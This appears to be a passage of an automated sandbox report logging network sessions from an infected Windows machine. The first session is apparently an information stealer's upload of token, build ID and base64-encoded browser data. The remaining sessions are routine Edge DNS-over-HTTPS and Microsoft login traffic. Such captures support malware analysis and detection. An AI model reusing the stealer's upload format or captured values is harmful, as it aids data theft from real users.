                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 47 43 41 41 46 42 46 42 4b 46 49 44 47 44 48 4a 44 42 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------DGCAAFBFBKFIDGDHJDBKContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------DGCAAFBFBKFIDGDHJDBKCont
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:39 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  28192.168.2.849797162.159.61.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:38 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:38 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                                                                                                                                                  CF-RAY: 8e617b55f9bb43a5-EWR
                                                                                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:38 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 25 00 04 8e fb 20 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom% c)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  29192.168.2.849796172.64.41.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  30192.168.2.849798162.159.61.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 128
                                                                                                                                                                                                                                                                                                                  Accept: application/dns-message
                                                                                                                                                                                                                                                                                                                  Accept-Language: *
                                                                                                                                                                                                                                                                                                                  User-Agent: Chrome
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:37 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                                  Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                  31192.168.2.84979540.126.53.18443
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:38 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                  Content-Length: 4722
                                                                                                                                                                                                                                                                                                                  Host: login.live.com
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:38 UTC4722OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                  Expires: Thu, 21 Nov 2024 14:47:38 GMT
                                                                                                                                                                                                                                                                                                                  P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                  x-ms-route-info: C516_SN1
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: dfa770bb-df4f-4482-821b-773ddbfdc9b8
                                                                                                                                                                                                                                                                                                                  PPServer: PPV: 30 H: SN1PEPF0003F95C V: 0
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:38 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Content-Length: 10197
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:39 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  32192.168.2.849799162.159.61.34431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
